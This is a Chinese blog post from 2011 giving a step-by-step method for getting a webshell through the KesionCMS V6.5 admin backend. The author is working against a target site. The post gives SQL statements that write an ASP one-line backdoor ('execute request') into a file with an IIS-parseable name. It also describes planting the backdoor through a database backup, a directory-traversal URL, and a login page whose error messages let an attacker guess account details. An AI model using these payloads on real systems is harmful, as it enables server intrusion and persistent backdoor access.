KesionCMS V6.5后台拿SHELL方法

Title:KesionCMS V6.5后台拿SHELL方法  --2011-03-29 00:21

最近弄一个站点,是KesionCMS V6.5的WEB系统,试了下后台拿webshell方法,记下来.

1.

新建x.asp用户再结合IIS的文件夹解析漏洞,是可以拿到SHELL的,前提是没有禁止.asp目录的访问,我弄的目标站,不允许访问.asp这样的目录下面的文件的.

2.

后台SQL执行导出webshell

理论上是可以的,我在本地可以导出ok.asp;o.xls这样的文件的。但是TXT文件的话,";"会被替换成"_".也就不起作用了。

create table cmd (a varchar(50))

insert into cmd (a) values ('┼攠數畣整爠煥敵瑳∨∣┩愾')

OR

insert into cmd (a) values ('<%execute request("a")%>')

select * into [a] in 'd:\wwwroot\a.asp;a.xls' 'excel 8.0;' from cmd

导出去以后,IIS需要重启一次。WEB才没有挂掉。但是我第一次导出的时候,并没有挂。

导出去以后同目录下面还会生成一个INI的文件。

3.

数据库插马,然后备份SHELL

选择KS_Collect.Mdb数据库,因为数据量小些,方便。

当然也可以把主数据库的NOTDOWN里面的数据UPDATA成一句话备份。

create table C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))

insert into C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values ('┼攠數畣整爠煥敵瑳∨∣┩愾')//此处一点要弄编码,不要有杂的符号.

然后去备份成ASP页面的文件,就可以了,有时候不成功的话,插马的语句选择是关键。

drop table C:\wwwroot\KS_Data\Collect\KS_Collect.Mdb.cmd

KesionCMS V6.5后台拿SHELL方法
系统还有其他地方有安全隐患的地方。

如跨目录浏览http://www.xxx.org/admin/KS.AdminFiles.asp?UploadDir=../..

KesionCMS V6.5后台拿SHELL方法

在后台管理的登录界面,可以猜测管理员账号,密码,管理认证码,都是单独报错误的。

ANSI2Unicode

上一篇:Java String和Date的转换


下一篇:flink学习笔记:DataSream API